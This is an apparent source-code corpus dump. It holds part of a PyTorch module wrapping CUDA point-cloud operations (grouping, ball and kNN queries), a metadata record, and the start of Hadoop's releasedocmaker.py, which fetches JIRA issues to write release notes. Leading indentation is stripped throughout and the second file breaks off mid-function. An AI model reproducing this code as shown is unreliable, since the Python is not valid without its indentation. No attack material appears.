return output
@staticmethod
def backward(ctx, grad_out: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
"""
input: grad_out: (b, c, n)
output: grad_features: (b, c, m), None, None
"""
idx, weight, m = ctx.interpolation_for_backward
b, c, n = grad_out.size()
grad_features = torch.cuda.FloatTensor(b, c, m).zero_()
grad_out_data = grad_out.data.contiguous()
pointops_cuda.interpolation_backward_cuda(b, c, n, m, grad_out_data, idx, weight, grad_features.data)
return grad_features, None, None
interpolation = Interpolation.apply
class Grouping(Function):
@staticmethod
def forward(ctx, features: torch.Tensor, idx: torch.Tensor) -> torch.Tensor:
"""
        input: features: (b, c, n), idx : (b, m, nsample) containing the indices of features to group with
output: (b, c, m, nsample)
"""
assert features.is_contiguous()
assert idx.is_contiguous()
b, c, n = features.size()
_, m, nsample = idx.size()
output = torch.cuda.FloatTensor(b, c, m, nsample)
pointops_cuda.grouping_forward_cuda(b, c, n, m, nsample, features, idx, output)
ctx.for_backwards = (idx, n)
return output
@staticmethod
def backward(ctx, grad_out: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
input: grad_out: (b, c, m, nsample)
output: (b, c, n), None
"""
idx, n = ctx.for_backwards
b, c, m, nsample = grad_out.size()
grad_features = torch.cuda.FloatTensor(b, c, n).zero_()
grad_out_data = grad_out.data.contiguous()
pointops_cuda.grouping_backward_cuda(b, c, n, m, nsample, grad_out_data, idx, grad_features.data)
return grad_features, None
grouping = Grouping.apply
class GroupingInt(Function):
@staticmethod
def forward(ctx, features: torch.Tensor, idx: torch.Tensor) -> torch.Tensor:
"""
        input: features: (b, c, n), idx : (b, m, nsample) containing the indices of features to group with
output: (b, c, m, nsample)
"""
assert features.is_contiguous()
assert idx.is_contiguous()
b, c, n = features.size()
_, m, nsample = idx.size()
output = torch.cuda.LongTensor(b, c, m, nsample)
pointops_cuda.grouping_int_forward_cuda(b, c, n, m, nsample, features, idx, output)
return output
@staticmethod
def backward(ctx, a=None):
return None, None
grouping_int = GroupingInt.apply
class BallQuery(Function):
@staticmethod
def forward(ctx, radius: float, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor) -> torch.Tensor:
"""
input: radius: float, radius of the balls
nsample: int, maximum number of features in the balls
xyz: torch.Tensor, (b, n, 3) xyz coordinates of the features
new_xyz: torch.Tensor, (b, m, 3) centers of the ball query
        output: (b, m, nsample) tensor with the indices of the features that form the query balls
"""
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
b, n, _ = xyz.size()
m = new_xyz.size(1)
idx = torch.cuda.IntTensor(b, m, nsample).zero_()
pointops_cuda.ballquery_cuda(b, n, m, radius, nsample, new_xyz, xyz, idx)
return idx
@staticmethod
def backward(ctx, a=None):
return None, None, None, None
ballquery = BallQuery.apply
class FeatureDistribute(Function):
@staticmethod
def forward(ctx, max_xyz: torch.Tensor, xyz: torch.Tensor) -> torch.Tensor:
"""
:param ctx:
:param max_xyz: (b, n, 3)
:param xyz: (b, m, 3)
:return: distribute_idx: (b, m)
"""
assert max_xyz.is_contiguous()
assert xyz.is_contiguous()
b, n, _ = max_xyz.size()
m = xyz.size(1)
distribute_idx = torch.cuda.IntTensor(b, m).zero_()
pointops_cuda.featuredistribute_cuda(b, n, m, max_xyz, xyz, distribute_idx)
return distribute_idx
@staticmethod
def backward(ctx, a=None):
return None, None
featuredistribute = FeatureDistribute.apply
class FeatureGather(Function):
@staticmethod
def forward(ctx, max_feature: torch.Tensor, distribute_idx: torch.Tensor) -> torch.Tensor:
'''
:param ctx:
:param max_feature: (b, c, n)
:param distribute_idx: (b, m)
:return: distribute_feature: (b, c, m)
'''
assert max_feature.is_contiguous()
assert distribute_idx.is_contiguous()
b, c, n = max_feature.size()
m = distribute_idx.size(1)
distribute_feature = torch.cuda.FloatTensor(b, c, m).zero_()
pointops_cuda.featuregather_forward_cuda(b, n, m, c, max_feature, distribute_idx, distribute_feature)
ctx.for_backwards = (distribute_idx, n)
return distribute_feature
@staticmethod
def backward(ctx, grad_distribute_feature: torch.Tensor):
'''
:param ctx:
:param grad_distribute_feature: (b, c, m)
:return: grad_max_feature: (b, c, n), None
'''
distribute_idx, n = ctx.for_backwards
b, c, m = grad_distribute_feature.size()
grad_max_feature = torch.cuda.FloatTensor(b, c, n).zero_()
grad_distribute_feature_data = grad_distribute_feature.data.contiguous()
pointops_cuda.featuregather_backward_cuda(b, n, m, c, grad_distribute_feature_data, distribute_idx, grad_max_feature.data)
return grad_max_feature, None
featuregather = FeatureGather.apply
class LabelStatBallRange(Function):
@staticmethod
def forward(ctx, radius: float, xyz: torch.Tensor, new_xyz: torch.Tensor, label_stat: torch.Tensor) -> torch.Tensor:
'''
:param ctx:
:param radius:
:param xyz: (b, n, 3)
:param new_xyz: (b, m, 3)
:param label_stat: (b, n, nclass)
:return: new_label_stat: (b, m, nclass)
'''
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
assert label_stat.is_contiguous()
b, n, nclass = label_stat.size()
m = new_xyz.size(1)
new_label_stat = torch.cuda.IntTensor(b, m, nclass).zero_()
pointops_cuda.labelstat_ballrange_cuda(b, n, m, radius, nclass, new_xyz, xyz, label_stat, new_label_stat)
return new_label_stat
@staticmethod
def backward(ctx, a=None):
return None, None, None, None
labelstat_ballrange = LabelStatBallRange.apply
class LabelStatIdx(Function):
@staticmethod
def forward(ctx, nsample: int, label_stat: torch.Tensor, idx: torch.Tensor) -> torch.Tensor:
'''
:param ctx:
:param nsample:
:param label_stat: (b, n, nclass)
:param idx: (b, m, nsample)
:return: new_label_stat: (b, m, nclass)
'''
assert label_stat.is_contiguous()
assert idx.is_contiguous()
b, n, nclass = label_stat.size()
m = idx.size(1)
new_label_stat = torch.cuda.IntTensor(b, m, nclass).zero_()
pointops_cuda.labelstat_idx_cuda(b, n, m, nsample, nclass, label_stat, idx, new_label_stat)
return new_label_stat
@staticmethod
def backward(ctx, a=None):
return None, None, None
labelstat_idx = LabelStatIdx.apply
class LabelStatAndBallQuery(Function):
@staticmethod
def forward(ctx, radius: float, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor, label_stat: torch.Tensor):
'''
:param ctx:
:param radius:
:param nsample:
:param xyz: (b, n, 3)
:param new_xyz: (b, m, 3)
:param label_stat: (b, n, nclass)
:return: new_label_stat: (b, m, nclass) idx: (b, m, nsample)
'''
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
assert label_stat.is_contiguous()
b, n, nclass = label_stat.size()
m = new_xyz.size(1)
new_label_stat = torch.cuda.IntTensor(b, m, nclass).zero_()
idx = torch.cuda.IntTensor(b, m, nsample).zero_()
pointops_cuda.labelstat_and_ballquery_cuda(b, n, m, radius, nsample, nclass, new_xyz, xyz, label_stat, idx, new_label_stat)
return new_label_stat, idx
@staticmethod
def backward(ctx, a=None, b=None):
return None, None, None, None, None
labelstat_and_ballquery = LabelStatAndBallQuery.apply
def pairwise_distances(x, y=None):
'''
Input: x is a Nxd matrix
           y is an optional Mxd matrix
    Output: dist is a NxM matrix where dist[i,j] is the squared norm between x[i,:] and y[j,:]
if y is not given then use 'y=x'.
i.e. dist[i,j] = ||x[i,:]-y[j,:]||^2
'''
x_norm = (x ** 2).sum(1).view(-1, 1)
if y is not None:
y_t = torch.transpose(y, 0, 1)
y_norm = (y ** 2).sum(1).view(1, -1)
else:
y_t = torch.transpose(x, 0, 1)
y_norm = x_norm.view(1, -1)
    dist = x_norm + y_norm - 2.0 * torch.mm(x, y_t)
    # numpy is already imported at module level
    return torch.clamp(dist, 0.0, np.inf)
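# Illustrative sanity check for pairwise_distances (not part of the original
# file): entry (i, j) should equal the squared Euclidean distance between
# x[i] and y[j].
#   x = torch.rand(5, 3); y = torch.rand(7, 3)
#   d = pairwise_distances(x, y)                                  # (5, 7)
#   ref = ((x[:, None, :] - y[None, :, :]) ** 2).sum(-1)
#   assert torch.allclose(d, ref, atol=1e-5)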
class KNNQueryNaive(Function):
@staticmethod
def forward(ctx, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
KNN Indexing
        input: nsample: int32, number of neighbors
               xyz: (b, n, 3) coordinates of the features
               new_xyz: (b, m, 3) centroids
output: idx: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
b, m, _ = new_xyz.size()
n = xyz.size(1)
'''
idx = torch.zeros(b, m, nsample).int().cuda()
for i in range(b):
dist = pairwise_distances(new_xyz[i, :, :], xyz[i, :, :])
[_, idxs] = torch.sort(dist, dim=1)
idx[i, :, :] = idxs[:, 0:nsample]
'''
# '''
# new_xyz_repeat = new_xyz.repeat(1, 1, n).view(b, m * n, 3)
# xyz_repeat = xyz.repeat(1, m, 1).view(b, m * n, 3)
# dist = (new_xyz_repeat - xyz_repeat).pow(2).sum(dim=2).view(b, m, n)
dist = (new_xyz.repeat(1, 1, n).view(b, m * n, 3) - xyz.repeat(1, m, 1).view(b, m * n, 3)).pow(2).sum(dim=2).view(b, m, n)
[_, idxs] = torch.sort(dist, dim=2)
idx = idxs[:, :, 0:nsample].int()
# '''
return idx
@staticmethod
def backward(ctx):
return None, None, None
knnquery_naive = KNNQueryNaive.apply
class KNNQuery(Function):
@staticmethod
def forward(ctx, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
KNN Indexing
        input: nsample: int32, number of neighbors
               xyz: (b, n, 3) coordinates of the features
               new_xyz: (b, m, 3) centroids
output: idx: (b, m, nsample)
( dist2: (b, m, nsample) )
"""
if new_xyz is None:
new_xyz = xyz
assert xyz.is_contiguous()
assert new_xyz.is_contiguous()
b, m, _ = new_xyz.size()
n = xyz.size(1)
idx = torch.cuda.IntTensor(b, m, nsample).zero_()
dist2 = torch.cuda.FloatTensor(b, m, nsample).zero_()
pointops_cuda.knnquery_cuda(b, n, m, nsample, xyz, new_xyz, idx, dist2)
return idx
@staticmethod
def backward(ctx, a=None):
return None, None, None
knnquery = KNNQuery.apply
class KNNQueryExclude(Function):
@staticmethod
def forward(ctx, nsample: int, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
KNN Indexing
        input: nsample: int32, number of neighbors
               xyz: (b, n, 3) coordinates of the features
               new_xyz: (b, m, 3) centroids
output: new_features: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
b, m, _ = new_xyz.size()
n = xyz.size(1)
'''
idx = torch.zeros(b, m, nsample).int().cuda()
for i in range(b):
dist = pairwise_distances(new_xyz[i, :, :], xyz[i, :, :])
[_, idxs] = torch.sort(dist, dim=1)
idx[i, :, :] = idxs[:, 0:nsample]
'''
# '''
# new_xyz_repeat = new_xyz.repeat(1, 1, n).view(b, m * n, 3)
# xyz_repeat = xyz.repeat(1, m, 1).view(b, m * n, 3)
# dist = (new_xyz_repeat - xyz_repeat).pow(2).sum(dim=2).view(b, m, n)
dist = (new_xyz.repeat(1, 1, n).view(b, m * n, 3) - xyz.repeat(1, m, 1).view(b, m * n, 3)).pow(2).sum(dim=2).view(b, m, n)
[_, idxs] = torch.sort(dist, dim=2)
idx = idxs[:, :, 1:nsample+1].int()
# '''
return idx
@staticmethod
def backward(ctx):
return None, None, None
knnquery_exclude = KNNQueryExclude.apply
class Le_QueryAndGroup_SameSize(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Le_QueryAndGroup_SameSize, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
               new_xyz: (b, n, 3) centroids
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
assert xyz.size() == new_xyz.size()
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx) # (b, c, m, nsample)
if self.use_xyz:
#new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample) # le
new_features = grouped_features # (b, c, m, nsample)
else:
new_features = grouped_features
else:
assert self.use_xyz, "Cannot have not features and not use xyz as a feature!"
new_features = grouped_xyz
return grouped_xyz, new_features
class QueryAndGroup(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(QueryAndGroup, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
               new_xyz: (b, m, 3) centroids
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx)
if self.use_xyz:
new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample)
else:
new_features = grouped_features
else:
            assert self.use_xyz, "Cannot have both features=None and use_xyz=False!"
new_features = grouped_xyz
return new_features
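# Illustrative usage of the grouping utilities (not part of the original file,
# assumes the compiled pointops_cuda extension and a CUDA device):
#   xyz = torch.rand(2, 1024, 3).cuda()                           # (b, n, 3)
#   feats = torch.rand(2, 64, 1024).cuda()                        # (b, c, n)
#   idx = furthestsampling(xyz, 256)                              # (b, 256)
#   new_xyz = gathering(xyz.transpose(1, 2).contiguous(), idx)    # (b, 3, 256)
#   new_xyz = new_xyz.transpose(1, 2).contiguous()                # (b, 256, 3)
#   group = QueryAndGroup(radius=None, nsample=32, use_xyz=True)  # kNN grouping
#   new_feats = group(xyz, new_xyz, feats)                        # (b, 67, 256, 32)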
class QueryAndGroup_Dilate(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(QueryAndGroup_Dilate, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, 2*self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(2*self.nsample, xyz, new_xyz) # (b, m, nsample)
idx2 = np.array([i for i in range(2*self.nsample)])
np.random.shuffle(idx2)
idx2 = idx2[:self.nsample]
idx = idx[:, :, idx2]
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx)
if self.use_xyz:
new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample)
else:
new_features = grouped_features
else:
            assert self.use_xyz, "Cannot have both features=None and use_xyz=False!"
new_features = grouped_xyz
return new_features
class Le_QueryAndGroup(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Le_QueryAndGroup, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
               new_xyz: (b, m, 3) centroids
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous()
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx) # (b, c, m, nsample)
if self.use_xyz:
#new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample) # le
new_features = grouped_features # (b, c, m, nsample)
else:
new_features = grouped_features
else:
            assert self.use_xyz, "Cannot have both features=None and use_xyz=False!"
new_features = grouped_xyz
return grouped_xyz, new_features
class Gen_QueryAndGroupXYZ(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Gen_QueryAndGroupXYZ, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
#def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
               new_xyz: (b, m, 3) centroids
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
#if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
xyz_trans = xyz.transpose(1, 2).contiguous() # BxNx3 -> Bx3xN
grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
return grouped_xyz
class Le_QueryAndGroup_OnlyFeature(nn.Module):
"""
Groups with a ball query of radius
parameters:
radius: float32, Radius of ball
nsample: int32, Maximum number of features to gather in the ball
"""
def __init__(self, radius=None, nsample=32, use_xyz=True):
super(Le_QueryAndGroup_OnlyFeature, self).__init__()
self.radius, self.nsample, self.use_xyz = radius, nsample, use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor = None, features: torch.Tensor = None, idx: torch.Tensor = None) -> torch.Tensor:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: (b, m, 3) centriods
features: (b, c, n)
idx: idx of neighbors
# idxs: (b, n)
output: new_features: (b, c+3, m, nsample)
# grouped_idxs: (b, m, nsample)
"""
if new_xyz is None:
new_xyz = xyz
if idx is None:
if self.radius is not None:
idx = ballquery(self.radius, self.nsample, xyz, new_xyz)
else:
# idx = knnquery_naive(self.nsample, xyz, new_xyz) # (b, m, nsample)
idx = knnquery(self.nsample, xyz, new_xyz) # (b, m, nsample)
#xyz_trans = xyz.transpose(1, 2).contiguous()
#grouped_xyz = grouping(xyz_trans, idx) # (b, 3, m, nsample)
# grouped_idxs = grouping(idxs.unsqueeze(1).float(), idx).squeeze(1).int() # (b, m, nsample)
#grouped_xyz -= new_xyz.transpose(1, 2).unsqueeze(-1)
if features is not None:
grouped_features = grouping(features, idx) # (b, c, m, nsample)
if self.use_xyz:
#new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, m, nsample) # le
new_features = grouped_features # (b, c, m, nsample)
else:
new_features = grouped_features
        else:
            # grouped_xyz is never computed in this feature-only variant (the xyz
            # grouping above is commented out), so features must be provided
            raise ValueError("Le_QueryAndGroup_OnlyFeature requires features to be provided")
return new_features
class GroupAll(nn.Module):
"""
Groups all features
"""
def __init__(self, use_xyz: bool = True):
super(GroupAll, self).__init__()
self.use_xyz = use_xyz
def forward(self, xyz: torch.Tensor, new_xyz: torch.Tensor, features: torch.Tensor = None) -> Tuple[torch.Tensor]:
"""
input: xyz: (b, n, 3) coordinates of the features
new_xyz: ignored torch
features: (b, c, n) descriptors of the features
output: new_features: (b, c+3, 1, N) tensor
"""
grouped_xyz = xyz.transpose(1, 2).unsqueeze(2)
if features is not None:
grouped_features = features.unsqueeze(2)
if self.use_xyz:
new_features = torch.cat([grouped_xyz, grouped_features], dim=1) # (b, c+3, 1, n)
else:
new_features = grouped_features
else:
new_features = grouped_xyz
return new_features
``` |
{
"source": "jiazhaoquan-bit/hadoop-3.1.3-src",
"score": 2
} |
#### File: lib/release-doc-maker/releasedocmaker.py
```python
from glob import glob
from optparse import OptionParser
from time import gmtime, strftime, sleep
from distutils.version import LooseVersion
import errno
import os
import re
import shutil
import sys
import urllib
import urllib2
import httplib
import json
from utils import to_unicode, sanitize_text, processrelnote, Outputs
try:
import dateutil.parser
except ImportError:
print "This script requires python-dateutil module to be installed. " \
"You can install it using:\n\t pip install python-dateutil"
sys.exit(1)
RELEASE_VERSION = {}
JIRA_BASE_URL = "https://issues.apache.org/jira"
SORTTYPE = 'resolutiondate'
SORTORDER = 'older'
NUM_RETRIES = 5
# label to be used to mark an issue as Incompatible change.
BACKWARD_INCOMPATIBLE_LABEL = 'backward-incompatible'
CHANGEHDR1 = "| JIRA | Summary | Priority | " + \
"Component | Reporter | Contributor |\n"
CHANGEHDR2 = "|:---- |:---- | :--- |:---- |:---- |:---- |\n"
ASF_LICENSE = '''
<!---
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-->
'''
def buildindex(title, asf_license):
"""Write an index file for later conversion using mvn site"""
versions = glob("[0-9]*.[0-9]*")
versions.sort(key=LooseVersion, reverse=True)
with open("index.md", "w") as indexfile:
if asf_license is True:
indexfile.write(ASF_LICENSE)
for version in versions:
indexfile.write("* %s v%s\n" % (title, version))
for k in ("Changes", "Release Notes"):
indexfile.write(" * [%s](%s/%s.%s.html)\n" %
(k, version, k.upper().replace(" ", ""),
version))
def buildreadme(title, asf_license):
"""Write an index file for Github using README.md"""
versions = glob("[0-9]*.[0-9]*")
versions.sort(key=LooseVersion, reverse=True)
with open("README.md", "w") as indexfile:
if asf_license is True:
indexfile.write(ASF_LICENSE)
for version in versions:
indexfile.write("* %s v%s\n" % (title, version))
for k in ("Changes", "Release Notes"):
indexfile.write(" * [%s](%s/%s.%s.md)\n" %
(k, version, k.upper().replace(" ", ""),
version))
class GetVersions(object):
""" List of version strings """
def __init__(self, versions, projects):
versions = versions
projects = projects
self.newversions = []
versions.sort(key=LooseVersion)
print "Looking for %s through %s" % (versions[0], versions[-1])
newversions = set()
for project in projects:
url = JIRA_BASE_URL + \
"/rest/api/2/project/%s/versions" % project.upper()
try:
resp = urllib2.urlopen(url)
except urllib2.HTTPError as err:
code = err.code
print "JIRA returns HTTP error %d: %s. Aborting." % (code, err.msg)
error_response = err.read()
try:
error_response = json.loads(error_response)
print "- Please ensure that specified projects are correct."
for message in error_response['errorMessages']:
print "-", message
except Exception:
print "Couldn't parse server response."
sys.exit(1)
datum = json.loads(resp.read())
for data in datum:
newversions.add(data['name'])
newlist = list(newversions.copy())
newlist.append(versions[0])
newlist.append(versions[-1])
newlist.sort(key=LooseVersion)
start_index = newlist.index(versions[0])
end_index = len(newlist) - 1 - newlist[::-1].index(versions[-1])
for newversion in newlist[start_index + 1:end_index]:
if newversion in newversions:
print "Adding %s to the list" % newversion
self.newversions.append(newversion)
def getlist(self):
return self.newversions
class Version(object):
"""Represents a version number"""
def __init__(self, data):
self.mod = False
self.data = data
found = re.match(r'^((\d+)(\.\d+)*).*$', data)
if found:
self.parts = [int(p) for p in found.group(1).split('.')]
else:
self.parts = []
# backfill version with zeroes if missing parts
self.parts.extend((0,) * (3 - len(self.parts)))
def __str__(self):
if self.mod:
return '.'.join([str(p) for p in self.parts])
return self.data
def __cmp__(self, other):
return cmp(self.parts, other.parts)
class Jira(object):
"""A single JIRA"""
def __init__(self, data, parent):
self.key = data['key']
self.fields = data['fields']
self.parent = parent
self.notes = None
self.incompat = None
self.reviewed = None
self.important = None
def get_id(self):
return to_unicode(self.key)
def get_description(self):
return to_unicode(self.fields['description'])
def get_release_note(self):
if self.notes is None:
field = self.parent.field_id_map['Release Note']
if field in self.fields:
self.notes = to_unicode(self.fields[field])
elif self.get_incompatible_change() or self.get_important():
self.notes = self.get_description()
else:
self.notes = ""
return self.notes
def get_priority(self):
ret = ""
pri = self.fields['priority']
if pri is not None:
ret = pri['name']
return to_unicode(ret)
def get_assignee(self):
ret = ""
mid = self.fields['assignee']
if mid is not None:
ret = mid['displayName']
return to_unicode(ret)
def get_components(self):
if len(self.fields['components']) > 0:
return ", ".join([comp['name'] for comp in self.fields['components']
])
else:
return ""
def get_summary(self):
return self.fields['summary']
def get_type(self):
ret = ""
mid = self.fields['issuetype']
if mid is not None:
ret = mid['name']
return to_unicode(ret)
def get_reporter(self):
ret = ""
mid = self.fields['reporter']
if mid is not None:
ret = mid['displayName']
return to_unicode(ret)
def get_project(self):
ret = ""
mid = self.fields['project']
if mid is not None:
ret = mid['key']
return to_unicode(ret)
def __cmp__(self, other):
result = 0
if SORTTYPE == 'issueid':
# compare by issue name-number
selfsplit = self.get_id().split('-')
othersplit = other.get_id().split('-')
result = cmp(selfsplit[0], othersplit[0])
if result == 0:
result = cmp(int(selfsplit[1]), int(othersplit[1]))
# dec is supported for backward compatibility
if SORTORDER in ['dec', 'desc']:
result *= -1
elif SORTTYPE == 'resolutiondate':
dts = dateutil.parser.parse(self.fields['resolutiondate'])
dto = dateutil.parser.parse(other.fields['resolutiondate'])
result = cmp(dts, dto)
if SORTORDER == 'newer':
result *= -1
return result
def get_incompatible_change(self):
if self.incompat is None:
field = self.parent.field_id_map['Hadoop Flags']
self.reviewed = False
self.incompat = False
if field in self.fields:
if self.fields[field]:
for flag in self.fields[field]:
if flag['value'] == "Incompatible change":
self.incompat = True
if flag['value'] == "Reviewed":
self.reviewed = True
else:
# Custom field 'Hadoop Flags' is not defined,
# search for 'backward-incompatible' label
field = self.parent.field_id_map['Labels']
if field in self.fields and self.fields[field]:
if BACKWARD_INCOMPATIBLE_LABEL in self.fields[field]:
self.incompat = True
self.reviewed = True
return self.incompat
def get_important(self):
if self.important is None:
field = self.parent.field_id_map['Flags']
self.important = False
if field in self.fields:
if self.fields[field]:
for flag in self.fields[field]:
if flag['value'] == "Important":
self.important = True
return self.important
class JiraIter(object):
"""An Iterator of JIRAs"""
@staticmethod
def collect_fields():
"""send a query to JIRA and collect field-id map"""
resp = urllib2.urlopen(JIRA_BASE_URL + "/rest/api/2/field")
data = json.loads(resp.read())
field_id_map = {}
for part in data:
field_id_map[part['name']] = part['id']
return field_id_map
@staticmethod
def query_jira(ver, projects, pos):
"""send a query to JIRA and collect
a certain number of issue information"""
count = 100
pjs = "','".join(projects)
jql = "project in ('%s') and \
fixVersion in ('%s') and \
resolution = Fixed" % (pjs, ver)
params = urllib.urlencode({'jql': jql,
'startAt': pos,
'maxResults': count})
return JiraIter.load_jira(params, 0)
@staticmethod
def load_jira(params, fail_count):
"""send query to JIRA and collect with retries"""
try:
resp = urllib2.urlopen(JIRA_BASE_URL + "/rest/api/2/search?%s" %
params)
except urllib2.HTTPError, err:
code = err.code
print "JIRA returns HTTP error %d: %s. Aborting." % (code, err.msg)
error_response = err.read()
try:
error_response = json.loads(error_response)
print "- Please ensure that specified projects, fixVersions etc. are correct."
for message in error_response['errorMessages']:
print "-", message
except Exception:
print "Couldn't parse server response."
sys.exit(1)
except httplib.BadStatusLine as err:
return JiraIter.retry_load(err, params, fail_count)
try:
data = json.loads(resp.read())
except httplib.IncompleteRead as err:
